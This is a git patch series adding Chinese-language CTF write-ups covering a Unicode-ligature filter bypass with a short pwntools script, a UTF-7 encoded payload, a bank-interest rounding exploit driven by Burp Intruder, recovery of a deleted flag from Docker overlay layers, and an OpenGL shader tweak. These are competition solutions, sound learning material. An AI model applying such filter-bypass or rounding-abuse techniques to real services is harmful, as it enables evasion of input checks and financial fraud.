From d25184614cd9703bebde6fce12afece1ac409fce Mon Sep 17 00:00:00 2001 From: NaiveTomcat Date: Sat, 7 Nov 2020 12:51:15 +0800 Subject: [PATCH 1/3] added two wps --- .../NaiveTomcat/2020-11-07-字符串工具WP.md | 42 +++++++++++++++++++ players/NaiveTomcat/2020-11-07-狗狗银行WP.md | 25 +++++++++++ 2 files changed, 67 insertions(+) create mode 100644 players/NaiveTomcat/2020-11-07-字符串工具WP.md create mode 100644 players/NaiveTomcat/2020-11-07-狗狗银行WP.md diff --git a/players/NaiveTomcat/2020-11-07-字符串工具WP.md b/players/NaiveTomcat/2020-11-07-字符串工具WP.md new file mode 100644 index 0000000..513af7d --- /dev/null +++ b/players/NaiveTomcat/2020-11-07-字符串工具WP.md @@ -0,0 +1,42 @@ +--- +layout: post +title: 字符串工具WP +catalog: true +tags: + - CTF + - Hack +--- + +## 大小写转换 + +### 思路 + +本问利用Unicode连字U+FB02(fl连写),该字符被传入python的upper()方法后会被转为FL, +进而达到绕过过滤的方法 + +### 脚本 + +```python +#!/usr/bin/python +import pwn +token="token" +p=pwn.remote("202.38.93.111",10233) +p.sendline(token) +p.recvuntil("2. Convert my UTF-7 string to UTF-8!!") +p.sendline("1") +p.recvuntil("Welcome to the capitalizer tool, please input your string:") +payload="\ufb02\u0061\u0067" +p.sendline(payload) +p.interactive() +``` + +## UTF-7到UTF-8转换 + +### 思路 + +本问利用UTF-7编码规则,将flag中每个字母扩充为双字节(即在前面加/x00),整体base64编码 +并在最前面加上“+”以及去除末尾“=”,发送到服务,被UTF-7解码成flag进而获取flag + +### payload + +`+AGYAbABhAGc` diff --git a/players/NaiveTomcat/2020-11-07-狗狗银行WP.md b/players/NaiveTomcat/2020-11-07-狗狗银行WP.md new file mode 100644 index 0000000..51d2e8e --- /dev/null +++ b/players/NaiveTomcat/2020-11-07-狗狗银行WP.md @@ -0,0 +1,25 @@ +--- +layout: post +title: 狗狗银行WP +catalog: true +tags: + - CTF + - Hack +--- + +## 切入点 + +后端计算利息的近似方法为四舍五入,故构造合理余额可使得借记卡利息达到0.6%,高于信用卡的0.5%从而获取利润 + +## 解题方法 + +分析创建卡、转账的请求,使用burp的intruder批量发包,首先自行手动创建一张信用卡,再通过burp批量创建998张借记卡 +(为了满足题目新增要求),再通过burp从信用卡向每一张新增的信用卡转账167元 + +吃饭后,此时,每张卡都会有理论0.501元的利息,经过后端计算舍入得1元利息,共获得998元利息,而信用卡欠款166666元, +利息833.33元,有164元差额。除去吃饭的10元仍有利润。重复几天就可以使净资产大于2000。 + +## 错误解题方法 + +看到题我的第一思路是整型溢出,于是借了很多钱,用burp请求/api/eat很多次,最后返回的欠款有2^1000不止。后端应该用 +的BigDecimal,不会出现溢出。 From 818890f10eef5c779def44ba726f75da57ff2a9f Mon Sep 17 00:00:00 2001 From: NaiveTomcat Date: Sat, 7 Nov 2020 13:00:30 +0800 Subject: [PATCH 2/3] Added wp for opengl and docker --- players/NaiveTomcat/2020-11-07-dockerWP.md | 13 ++++++++ .../2020-11-07-超简陋的OpenGL小程序WP.md | 30 +++++++++++++++++++ 2 files changed, 43 insertions(+) create mode 100644 players/NaiveTomcat/2020-11-07-dockerWP.md create mode 100644 players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md diff --git a/players/NaiveTomcat/2020-11-07-dockerWP.md b/players/NaiveTomcat/2020-11-07-dockerWP.md new file mode 100644 index 0000000..da739bb --- /dev/null +++ b/players/NaiveTomcat/2020-11-07-dockerWP.md @@ -0,0 +1,13 @@ +--- +layout: post +title: Docker WP +catalog: true +tags: + - CTF + - Hack +--- + +## 思路 + +`/var/lib/docker/overlay2`中有pull下来的docker镜像的文件,而这个docker的构建是先有flag.txt +后来删除的,于是就能在这个目录中搜索到flag.txt。 diff --git a/players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md b/players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md new file mode 100644 index 0000000..41be91e --- /dev/null +++ b/players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md @@ -0,0 +1,30 @@ +--- +layout: post +title: 超简陋的OpenGL小程序WP +catalog: true +tags: + - CTF + - Hack +--- + +## 思路 + +着色器脚本中更改视角和光源位置,更改完后运行即可 + +## patch + +basic_lighting.fs +```diff +19c19 +< vec3 lightDir = normalize(-0.9* lightPos + FragPos); +--- +> vec3 lightDir = normalize(lightPos - FragPos); +``` + +basic_lighting.vs +```diff +14c14 +< FragPos = vec3(-1 *model * vec4(aPos, 1.0)); +--- +> FragPos = vec3(model * vec4(aPos, 1.0)); +``` From be66019e423807f7f97a7397f9f219d54b78453d Mon Sep 17 00:00:00 2001 From: NaiveTomcat Date: Sat, 7 Nov 2020 13:21:01 +0800 Subject: [PATCH 3/3] Removed yaml front matter --- players/NaiveTomcat/2020-11-07-dockerWP.md | 9 +-------- players/NaiveTomcat/2020-11-07-字符串工具WP.md | 9 +-------- players/NaiveTomcat/2020-11-07-狗狗银行WP.md | 9 +-------- players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md | 9 +-------- 4 files changed, 4 insertions(+), 32 deletions(-) diff --git a/players/NaiveTomcat/2020-11-07-dockerWP.md b/players/NaiveTomcat/2020-11-07-dockerWP.md index da739bb..8920e94 100644 --- a/players/NaiveTomcat/2020-11-07-dockerWP.md +++ b/players/NaiveTomcat/2020-11-07-dockerWP.md @@ -1,11 +1,4 @@ ---- -layout: post -title: Docker WP -catalog: true -tags: - - CTF - - Hack ---- +# Docker WP ## 思路 diff --git a/players/NaiveTomcat/2020-11-07-字符串工具WP.md b/players/NaiveTomcat/2020-11-07-字符串工具WP.md index 513af7d..9b87938 100644 --- a/players/NaiveTomcat/2020-11-07-字符串工具WP.md +++ b/players/NaiveTomcat/2020-11-07-字符串工具WP.md @@ -1,11 +1,4 @@ ---- -layout: post -title: 字符串工具WP -catalog: true -tags: - - CTF - - Hack ---- +# 字符串工具WP ## 大小写转换 diff --git a/players/NaiveTomcat/2020-11-07-狗狗银行WP.md b/players/NaiveTomcat/2020-11-07-狗狗银行WP.md index 51d2e8e..019bf36 100644 --- a/players/NaiveTomcat/2020-11-07-狗狗银行WP.md +++ b/players/NaiveTomcat/2020-11-07-狗狗银行WP.md @@ -1,11 +1,4 @@ ---- -layout: post -title: 狗狗银行WP -catalog: true -tags: - - CTF - - Hack ---- +# 狗狗银行WP ## 切入点 diff --git a/players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md b/players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md index 41be91e..1ea7373 100644 --- a/players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md +++ b/players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md @@ -1,11 +1,4 @@ ---- -layout: post -title: 超简陋的OpenGL小程序WP -catalog: true -tags: - - CTF - - Hack ---- +# 超简陋的OpenGL小程序WP ## 思路